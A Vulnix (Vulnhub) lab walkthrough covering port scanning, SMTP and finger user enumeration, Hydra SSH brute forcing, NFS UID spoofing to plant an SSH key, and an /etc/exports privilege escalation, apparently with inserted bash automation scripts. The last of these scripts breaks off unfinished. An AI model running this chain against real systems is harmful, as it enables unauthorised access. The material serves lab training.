Vulnhub - Vulnix box walkthrough
Target discovery
The target sits on the same L2 network as the attacking machine, so arp-scan can be used to discover it:
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 00:50:56:c0:00:08 (Unknown)
192.168.56.2 00:50:56:ea:c1:ad (Unknown)
192.168.56.130 00:0c:29:24:7f:60 (Unknown)
192.168.56.254 00:50:56:e0:f2:49 (Unknown)
8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.901 seconds (134.67 hosts/sec). 4 responded
Excluding the known addresses (.1, .2 and .254 all carry the 00:50:56 VMware OUI and belong to VMware's own virtual network services; they show as (Unknown) only because the OUI files could not be read), the target is 192.168.56.130.
PS: netdiscover -r <ip> can also be used for host discovery.
Information gathering
Port scanning
First run a full TCP port scan with nmap to find the open ports (a SYN scan with a high --min-rate is fine on a lab network, but would be noisy against a real target):
┌──(kali㉿kali)-[~]
└─$ nmap -sS -p- 192.168.56.130 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 22:20 EST
Nmap scan report for 192.168.56.130
Host is up (0.0024s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
34261/tcp open unknown
38838/tcp open unknown
40311/tcp open unknown
53813/tcp open unknown
54118/tcp open unknown
MAC Address: 00:0C:29:24:7F:60 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
Then identify the services on the open ports:
PS: -A also triggers OS detection, and nmap's OS fingerprinting is most accurate when it has both an open and a closed TCP port to probe, which is why a known-closed port (2) is appended to the port list.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p22,25,79,110,111,143,512,513,514,993,995,2049,34261,38838,40311,53813,54118,2 -A 192.168.56.130 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 23:44 EST
Nmap scan report for 192.168.56.130
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
2/tcp closed compressnet
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2026-02-05T04:46:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after: 2022-08-31T17:40:12
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_pop3-capabilities: PIPELINING TOP RESP-CODES UIDL SASL CAPA STLS
|_ssl-date: 2026-02-05T04:46:13+00:00; 0s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100005 1,2,3 38838/tcp mountd
| 100005 1,2,3 40979/tcp6 mountd
| 100005 1,2,3 42607/udp mountd
| 100005 1,2,3 47811/udp6 mountd
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_ssl-date: 2026-02-05T04:46:13+00:00; -1s from scanner time.
|_imap-capabilities: IDLE more have listed post-login capabilities IMAP4rev1 SASL-IR Pre-login LITERAL+ OK ID LOGIN-REFERRALS LOGINDISABLEDA0001 ENABLE STARTTLS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_imap-capabilities: IDLE AUTH=PLAINA0001 listed post-login more IMAP4rev1 SASL-IR have LITERAL+ OK ID capabilities Pre-login ENABLE LOGIN-REFERRALS
|_ssl-date: 2026-02-05T04:46:13+00:00; 0s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP RESP-CODES UIDL USER CAPA SASL(PLAIN)
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2026-02-05T04:46:13+00:00; 0s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
34261/tcp open mountd 1-3 (RPC #100005)
38838/tcp open mountd 1-3 (RPC #100005)
40311/tcp open mountd 1-3 (RPC #100005)
53813/tcp open nlockmgr 1-4 (RPC #100021)
54118/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:24:7F:60 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.56.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.89 seconds
Several key facts stand out:
- Port 2049 (NFS): network file system, lets remote hosts mount exported directories
- Port 111 (rpcbind): the RPC portmapper NFS depends on; mountd, nlockmgr and status are the high-numbered RPC ports seen in the first scan
- Port 22 (SSH): OpenSSH 5.9p1 on Ubuntu, the eventual login target
- Port 79 (finger): user information enumeration
- Port 25 (SMTP): Postfix, advertising VRFY
- Ports 512/513/514 (rexec/rlogin/rsh): legacy r-services, worth remembering if credentials turn up
- System information: Linux 2.6.32 - 3.10
NFS mount
Enumerate the directories the target exports over NFS:
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.130
Export list for 192.168.56.130:
/home/vulnix *
The target is misconfigured: the export is open to any host (*), so anyone who can reach it can mount /home/vulnix locally.
Mount it locally:
# Create a mount point
mkdir /tmp/vulnix_nfs
# Mount the export
sudo mount -t nfs 192.168.56.130:/home/vulnix /tmp/vulnix_nfs
But listing the contents is denied, even as root:
┌──(kali㉿kali)-[~]
└─$ ls -la /tmp/vulnix_nfs
ls: cannot open directory '/tmp/vulnix_nfs': Permission denied
┌──(kali㉿kali)-[~]
└─$ sudo ls -la /tmp/vulnix_nfs
[sudo] password for kali:
ls: cannot open directory '/tmp/vulnix_nfs': Permission denied
The denial comes down to a UID/GID mismatch. With AUTH_SYS, the default NFS security flavour, the server enforces file permissions against whatever UID and GID the client sends, and with the default root_squash option the client's root is mapped to nobody/nogroup. The export is a home directory under /home, so it is presumably owned by vulnix with a mode that excludes other users; neither the kali user's UID nor squashed root matches. The next step is therefore to find vulnix's UID and GID, either from some information leak on the box or from the server itself (mounting with -o vers=3 shows the raw numeric owner UID, because NFSv3 has no name-based idmapping).
Mail service
The scan showed SMTP on port 25; probe it with nmap's SMTP scripts:
┌──(kali㉿kali)-[~]
└─$ nmap --script=*smtp* -p 25 192.168.56.130
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-09 21:04 EST
Nmap scan report for 192.168.56.130
Host is up (0.0011s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
MAC Address: 00:0C:29:24:7F:60 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.14 seconds
From this output:
- smtp-enum-users could not enumerate users with the RCPT method (the server returned a status code the script does not handle).
- The mail server is Postfix, not Exim, so the Exim CVE check does not apply (most of the working SMTP exploits in Exploit DB target Exim).
- The EHLO reply (hostname vulnix) advertises PIPELINING, SIZE, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME and DSN.
VRFY, which this server leaves enabled, can be used to enumerate users:
| SMTP command | Function |
|---|---|
| MAIL FROM | Specifies the sender address |
| RCPT TO | Specifies one recipient; several RCPT TO commands may follow a single MAIL FROM |
| VRFY | Verifies whether a given user/mailbox exists; for security reasons servers often disable it |
| EXPN | Expands a mailing list and verifies its members; also frequently disabled |
Each command gets a reply code that indicates the outcome:
| Reply code | Meaning |
|---|---|
| 250 | Requested mail action completed (the mailbox exists) |
| 252 | Cannot VRFY the user, but the server will accept the message and attempt delivery; Postfix answers VRFY for an existing local user with 252, so enumeration tools count it as a hit |
| 550 | Requested action not taken: mailbox unavailable (e.g. not found, or not accessible) |
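To make the exchange behind the two tables concrete, here is a hand-rolled VRFY enumerator in bash, added as an example (it is not from the write-up or the box): it opens one SMTP session, sends EHLO, issues a VRFY per candidate name and classifies the reply code. The EHLO name attacker.local and the wordlist path are assumptions, and the replies in the demo at the bottom are constructed to look like Postfix's.

```bash
#!/usr/bin/env bash
# Hand-rolled VRFY enumeration, i.e. what smtp-user-enum -M VRFY does per name.
# Added example, not from the write-up or the box. The target address, the EHLO
# name and the wordlist path are assumptions; the sample replies in the demo at
# the bottom are constructed to look like Postfix's.
set -u

# vrfy_verdict REPLY -> exists | unknown | disabled | other
# RFC 5321: 250 = mailbox exists, 252 = cannot verify but will attempt delivery
# (Postfix answers "252 2.0.0 <user>" for any existing local user, so tools
# count it as a hit), 550/551/553 = no such mailbox, 502 = command disabled.
vrfy_verdict() {
  case "$1" in
    250*|252*)       echo exists ;;
    550*|551*|553*)  echo unknown ;;
    502*)            echo disabled ;;
    *)               echo other ;;
  esac
}

# smtp_read FD -> prints the last line of a (possibly multi-line) SMTP reply,
# CR stripped. Continuation lines have '-' after the code, the final one ' '.
smtp_read() {
  local fd=$1 line
  while IFS= read -r line <&"$fd"; do
    line=$(printf '%s' "$line" | tr -d '\r')
    case "$line" in
      [0-9][0-9][0-9]-*) continue ;;
      *) printf '%s\n' "$line"; return 0 ;;
    esac
  done
  return 1
}

# vrfy_enum HOST PORT WORDLIST: one TCP session, one VRFY per candidate name.
# Output: <name>\t<verdict>\t<raw reply>
vrfy_enum() {
  local host=$1 port=$2 wordlist=$3 user reply
  exec 3<>"/dev/tcp/$host/$port" || return 1   # bash built-in TCP client
  smtp_read 3 >/dev/null                       # 220 banner
  printf 'EHLO attacker.local\r\n' >&3
  smtp_read 3 >/dev/null                       # 250-... capability list
  while IFS= read -r user; do
    [ -n "$user" ] || continue
    printf 'VRFY %s\r\n' "$user" >&3
    reply=$(smtp_read 3)
    printf '%s\t%s\t%s\n' "$user" "$(vrfy_verdict "$reply")" "$reply"
    case "$reply" in 502*) break ;; esac       # VRFY disabled: stop early
  done < "$wordlist"
  printf 'QUIT\r\n' >&3
  exec 3>&-
}

# Usage against the box:
#   vrfy_enum 192.168.56.130 25 /usr/share/wordlists/metasploit/unix_users.txt
# Stand-alone demo on constructed replies (no network needed):
for reply in '252 2.0.0 root' \
             '550 5.1.1 <nosuch>: Recipient address rejected: User unknown in local recipient table' \
             '502 5.5.1 VRFY command is disabled'; do
  printf '%-8s <- %s\n' "$(vrfy_verdict "$reply")" "$reply"
done
```

smtp_read is the part tools get wrong most often: the EHLO reply is multi-line, and reading only one line would leave the capability list in the socket buffer and shift every later reply by one.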
So use the smtp-user-enum tool (not the nmap script of the same purpose) in VRFY mode with /usr/share/wordlists/metasploit/unix_users.txt:
┌──(kali㉿kali)-[~/Work]
└─$ sudo smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.56.130 > ./smtp用户扫描结果.txt
[sudo] password for kali:
┌──(kali㉿kali)-[~/Work]
└─$ cat smtp用户扫描结果.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/unix_users.txt
Target count ............. 1
Username count ........... 175
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Mon Feb 9 21:10:31 2026 #########
192.168.56.130: backup exists
192.168.56.130: bin exists
192.168.56.130: daemon exists
192.168.56.130: games exists
192.168.56.130: gnats exists
192.168.56.130: irc exists
192.168.56.130: libuuid exists
192.168.56.130: landscape exists
192.168.56.130: list exists
192.168.56.130: lp exists
192.168.56.130: mail exists
192.168.56.130: messagebus exists
192.168.56.130: man exists
192.168.56.130: nobody exists
192.168.56.130: news exists
192.168.56.130: postfix exists
192.168.56.130: postmaster exists
192.168.56.130: proxy exists
192.168.56.130: ROOT exists
192.168.56.130: root exists
192.168.56.130: sshd exists
192.168.56.130: sync exists
192.168.56.130: sys exists
192.168.56.130: syslog exists
192.168.56.130: user exists
192.168.56.130: uucp exists
192.168.56.130: whoopsie exists
192.168.56.130: www-data exists
######## Scan completed at Mon Feb 9 21:10:34 2026 #########
28 results.
175 queries in 3 seconds (58.3 queries / sec)
┌──(kali㉿kali)-[~/Work]
└─$ sudo smtp-user-enum -M VRFY -u vulnix -t 192.168.56.130
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Mon Feb 9 21:24:09 2026 #########
192.168.56.130: vulnix exists
######## Scan completed at Mon Feb 9 21:24:09 2026 #########
1 results.
1 queries in 1 seconds (1.0 queries / sec)
That is 29 hits in total, but ROOT is not a separate account: Postfix folds local recipient lookups to lowercase, so ROOT is simply root again (finger below confirms there is no such user). root, user and vulnix stand out; vulnix owns the home directory exported over NFS, and user and vulnix look like accounts created by the box author rather than by the system.
finger service
finger is a service for looking up information about users on a local or remote machine. Run with no argument it lists the users currently logged in (which is what nmap's finger script reported: "No one logged on"); given a user name it returns that account's details: login name, real name from the GECOS field, home directory, shell, last login, mail status and .plan, if any.
Command format: finger [options] [user@host]
┌──(kali㉿kali)-[~/Work]
└─$ finger {backup,bin,daemon,games,gnats,irc,landscape,libuuid,list,lp,mail,messagebus,man,news,nobody,postfix,postmaster,proxy,root,ROOT,sshd,sync,sys,syslog,user,uucp,whoopsie,www-data,vulnix}@192.168.56.130
Login: backup Name: backup
Directory: /var/backups Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: bin Name: bin
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: daemon Name: daemon
Directory: /usr/sbin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: games Name: games
Directory: /usr/games Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: gnats Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: irc Name: ircd
Directory: /var/run/ircd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: landscape Name:
Directory: /var/lib/landscape Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: libuuid Name:
Directory: /var/lib/libuuid Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: list Name: Mailing List Manager
Directory: /var/list Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: lp Name: lp
Directory: /var/spool/lpd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: mail Name: mail
Directory: /var/mail Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: dovecot Name: Dovecot mail server
Directory: /usr/lib/dovecot Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: messagebus Name:
Directory: /var/run/dbus Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: man Name: man
Directory: /var/cache/man Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: news Name: news
Directory: /var/spool/news Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: nobody Name: nobody
Directory: /nonexistent Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: postfix Name:
Directory: /var/spool/postfix Shell: /bin/false
Never logged in.
No mail.
No Plan.
finger: postmaster: no such user.
Login: proxy Name: proxy
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.
finger: ROOT: no such user.
Login: sshd Name:
Directory: /var/run/sshd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: sync Name: sync
Directory: /bin Shell: /bin/sync
Never logged in.
No mail.
No Plan.
Login: sys Name: sys
Directory: /dev Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: syslog Name:
Directory: /home/syslog Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: uucp Name: uucp
Directory: /var/spool/uucp Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: whoopsie Name:
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: www-data Name: www-data
Directory: /var/www Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
No credentials, but a few useful facts: root, user and vulnix are the only accounts with /bin/bash as their shell, and none of them has logged in yet. postmaster and ROOT are not system accounts at all (VRFY accepted postmaster because Postfix resolves it through its alias table, not /etc/passwd). Note also that dovecot and dovenull appear although they were never queried: fingerd matches the query against the words of the GECOS real-name field as well, so "mail" matched "Dovecot mail server" and "user" matched "Dovecot login user".
Penetration testing
SSH brute force
So far nothing directly exploitable has turned up and there is no web service to look at, so the next step is SSH password brute forcing. The enumeration produced four candidate users, root, ROOT, user and vulnix (the userlist file below holds those four names, one per line); try them with /usr/share/wordlists/metasploit/unix_passwords.txt or rockyou.txt.
┌──(kali㉿kali)-[~/Work]
└─$ sudo hydra -L ./userlist -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 10 ssh://192.168.56.130
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-09 22:00:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 4084 login tries (l:4/p:1021), ~409 tries per task
[DATA] attacking ssh://192.168.56.130:22/
[STATUS] 237.00 tries/min, 237 tries in 00:01h, 3847 to do in 00:17h, 10 active
[STATUS] 242.00 tries/min, 726 tries in 00:03h, 3358 to do in 00:14h, 10 active
[STATUS] 239.71 tries/min, 1678 tries in 00:07h, 2406 to do in 00:11h, 10 active
[22][ssh] host: 192.168.56.130 login: user password: letmein
[STATUS] 285.58 tries/min, 3427 tries in 00:12h, 657 to do in 00:03h, 10 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-09 22:15:40
This yields one credential: user:letmein
Log in with it and see whether it leads anywhere:
┌──(kali㉿kali)-[~]
└─$ ssh user@192.168.56.130
user@192.168.56.130's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Feb 10 06:05:15 GMT 2026
System load: 0.0 Processes: 89
Usage of /: 90.3% of 773MB Users logged in: 0
Memory usage: 8% IP address for eth0: 192.168.56.130
Swap usage: 0%
=> / is using 90.3% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
user@vulnix:~$ whoami
user
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
Post-exploitation
Local enumeration
With an initial foothold the next goal is privilege escalation. Testing shows that user cannot use sudo:

So run an enumeration script such as linux-exploit-suggester.sh or PEASS-ng (linpeas.sh) to collect local information and suggest possible escalation paths. PEASS-ng is used here:
# Upload linpeas.sh to the target (e.g. scp linpeas.sh user@192.168.56.130:/tmp/), make it executable and run it
chmod +x linpeas.sh
./linpeas.sh
Possible privilege escalation vectors:
User and group information:
Scheduled tasks:
At this point there is nothing to escalate with apart from kernel exploits that could crash the box, but the user and group information shows that vulnix, the owner of the NFS export, has UID 2008 (the same can be read with id vulnix or grep vulnix /etc/passwd). So create a local user with that UID and try the NFS share again.
NFS mount privilege escalation
The export is still mounted, so all that is needed is a local user with the same UID; the share becomes readable right away:
┌──(kali㉿kali)-[~]
└─$ sudo groupadd -g 2008 nfsattack
┌──(kali㉿kali)-[~]
└─$ sudo adduser --uid 2008 --gid 2008 nfsattack
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for nfsattack
Enter the new value, or press ENTER for the default
	Full Name []:
	Room Number []:
	Work Phone []:
	Home Phone []:
	Other []:
Is the information correct? [Y/n]
┌──(kali㉿kali)-[~]
└─$ ls /tmp
vulnix_nfs
┌──(kali㉿kali)-[~]
└─$ su nfsattack
Password:
┌──(nfsattack㉿kali)-[/home/kali]
└─$ ls -al /tmp/vulnix_nfs/
total 16
drwxr-x---  2 nobody nogroup 4096 Sep  2  2012 .
drwxrwxrwt 13 root   root     320 Feb 10 02:39 ..
-rw-r--r--  1 nobody nogroup  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 nobody nogroup 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 nobody nogroup  675 Apr  3  2012 .profile
Nothing useful in there. The owner shows as nobody/nogroup even though access now works: the mount negotiated NFSv4, whose owner names travel as name@domain strings, and the client maps a name it cannot resolve (there is no local user called vulnix) to nobody, while the server's permission check uses the numeric UID 2008 carried in the RPC credentials. The directory is drwxr-x---, so UID 2008 may write to it, which means we can create files:
So try planting an SSH public key and logging in as vulnix. First switch back to the kali user and generate a key pair with ssh-keygen, then as nfsattack write the public key into .ssh/authorized_keys inside the share, with .ssh at mode 700 and authorized_keys at mode 600 (sshd's StrictModes rejects anything looser):
# As kali: generate an ECDSA key pair (see the note below on why not RSA or Ed25519)
ssh-keygen -t ecdsa -f /tmp/vulnix_key -N ""
# Switch to the UID-2008 user so the NFS server accepts the writes
su nfsattack
cd /tmp/vulnix_nfs/
mkdir .ssh
cat /tmp/vulnix_key.pub > .ssh/authorized_keys
chmod 700 .ssh
chmod 600 .ssh/authorized_keys
ls -la .ssh/
exit
# Back as kali: log in as vulnix with the private key
ssh -i /tmp/vulnix_key vulnix@192.168.56.130
PS: the key type matters because the target runs OpenSSH 5.9p1. That server only signs RSA user keys with the SHA-1 based ssh-rsa algorithm, which OpenSSH clients from 8.8 onwards refuse by default, so an RSA key fails unless the client is started with -o PubkeyAcceptedAlgorithms=+ssh-rsa. Ed25519 is not an option either, since Ed25519 support only arrived in OpenSSH 6.5. ECDSA works with both sides as they are. The server version can be confirmed from the user shell (the flag is -V; -version is parsed as -v -e rsion, which still prints the version line before complaining about the escape character):
user@vulnix:/tmp$ ssh -version
OpenSSH_5.9p1 Debian-5ubuntu1, OpenSSL 1.0.1 14 Mar 2012
Bad escape character 'rsion'.
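The whole chain from this section as one bash script: read the export's owner UID straight from the server instead of waiting for linpeas, create the matching local user, choose a key type the old sshd accepts, and plant the key. This is an added example, not the write-up's own commands. It assumes a Linux attacking machine run as root with bash (for /dev/tcp), GNU coreutils, ssh-keygen and mount.nfs; it mounts with -o vers=3 so the owner appears as a numeric UID rather than the idmapped nobody; and /mnt/vulnix_nfs, the user name nfs<UID> and the VULNIX_TARGET/VULNIX_EXPORT variables are its own conventions.

```bash
#!/usr/bin/env bash
# UID-spoof + authorized_keys chain as one script, plus the two checks that
# remove the guesswork: read the export's owner UID from the server, and pick a
# key type the old sshd actually accepts.
# Added example, not from the write-up. Assumptions: Linux client with GNU
# coreutils, run as root, bash (for /dev/tcp), ssh-keygen and mount.nfs present;
# target and export path default to this box's. Mounting with vers=3 matters:
# NFSv3 reports the raw numeric owner UID, whereas NFSv4 idmapping shows nobody
# for a user name the client cannot resolve.
set -u

# nfs_owner_uid DIR -> numeric UID the server reports as owner of DIR
nfs_owner_uid() { stat -c %u "$1"; }

# ensure_uid_user UID NAME: create a local NAME with UID/GID = UID if missing
ensure_uid_user() {
  local uid=$1 name=$2
  id -u "$name" >/dev/null 2>&1 && return 0
  groupadd -g "$uid" "$name" && useradd -u "$uid" -g "$uid" -M -s /bin/bash "$name"
}

# key_type_for SERVER_VERSION -> key type a current client can use against it.
# OpenSSH < 6.5 has no Ed25519; OpenSSH < 7.2 signs RSA only with SHA-1 (ssh-rsa),
# which clients >= 8.8 refuse unless PubkeyAcceptedAlgorithms=+ssh-rsa is set.
# Unknown version: ECDSA, accepted by every OpenSSH since 5.7.
key_type_for() {
  case "$1" in
    '')                               echo ecdsa ;;
    OpenSSH_[0-5].*|OpenSSH_6.[0-4]*) echo ecdsa ;;
    *)                                echo ed25519 ;;
  esac
}

# plant_key HOMEDIR PUBKEY_FILE: append the key with the modes sshd's StrictModes
# requires (.ssh 700, authorized_keys 600); works on a local dir or an NFS mount.
# Subshell body so the umask does not leak into the caller.
plant_key() (
  umask 077
  mkdir -p "$1/.ssh" || exit 1
  cat "$2" >> "$1/.ssh/authorized_keys" || exit 1
  chmod 700 "$1/.ssh" && chmod 600 "$1/.ssh/authorized_keys"
)

# ssh_server_version HOST -> e.g. "OpenSSH_5.9p1 Debian-5ubuntu1" from the banner
ssh_server_version() {
  local banner
  exec 4<>"/dev/tcp/$1/22" || return 1
  IFS= read -r banner <&4
  exec 4>&-
  banner=$(printf '%s' "$banner" | tr -d '\r')
  printf '%s\n' "${banner#SSH-2.0-}"
}

main() {
  local target=$1 export_path=$2 mnt=/mnt/vulnix_nfs key=/tmp/vulnix_key
  local uid ktype
  mkdir -p "$mnt"
  mount -t nfs -o vers=3,nolock "$target:$export_path" "$mnt" || return 1
  uid=$(nfs_owner_uid "$mnt")
  echo "[*] export owner uid: $uid"
  ensure_uid_user "$uid" "nfs$uid" || return 1
  ktype=$(key_type_for "$(ssh_server_version "$target")")
  echo "[*] generating $ktype key"
  [ -f "$key" ] || ssh-keygen -q -t "$ktype" -f "$key" -N ""
  # Write as the UID-matched user so the server's AUTH_SYS check accepts it
  su -s /bin/bash -c "$(declare -f plant_key); plant_key '$mnt' '$key.pub'" "nfs$uid" || return 1
  echo "[*] now try: ssh -i $key <owner of $export_path>@$target"
}

# Run only when a target is given, e.g.:
#   sudo VULNIX_TARGET=192.168.56.130 VULNIX_EXPORT=/home/vulnix bash nfs_key_plant.sh
if [ -n "${VULNIX_TARGET:-}" ]; then
  main "$VULNIX_TARGET" "${VULNIX_EXPORT:-/home/vulnix}"
else
  echo "usage: VULNIX_TARGET=<ip> [VULNIX_EXPORT=<path>] $0"
  echo "key type for this box's sshd: $(key_type_for 'OpenSSH_5.9p1 Debian-5ubuntu1')"
fi
```

The su step is the crux: root on the client is squashed to nobody by the export, so the write has to come from a process whose UID equals the directory owner's, which is why the user is created with exactly that UID and GID.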
Successfully logged in as vulnix:
sudo -l shows that vulnix may edit the NFS configuration file /etc/exports as root without a password:
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
So edit the file and add root's home directory to the exports. The entry needs rw and no_root_squash, otherwise root on the attacking machine would still be squashed to nobody and could not write into /root (mode 700); with the same wildcard client as the existing line, that is an entry like /root *(rw,no_root_squash):
sudoedit /etc/exports
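Because the whole chain rests on two /etc/exports mistakes, the world-mountable /home/vulnix seen with showmount earlier and the no_root_squash entry for /root added here, the following bash audit (an added example, not from the write-up or the box) parses exports-style lines and flags both, alongside a restricted entry that passes. The three sample entries are constructed; the box's actual /etc/exports is never shown.

```bash
#!/usr/bin/env bash
# Audit /etc/exports entries for the NFS misconfigurations this box relies on:
#   - client list '*' or empty (any host may mount, as showmount -e showed),
#   - no_root_squash (root on the client becomes root on the export, which the
#     /root entry needs so the attacker can write authorized_keys),
#   - exporting a home directory, where access hinges on a client-chosen UID.
# Added example, not from the write-up or the box. The sample entries at the
# bottom are constructed; the box's actual /etc/exports is never shown.
set -u
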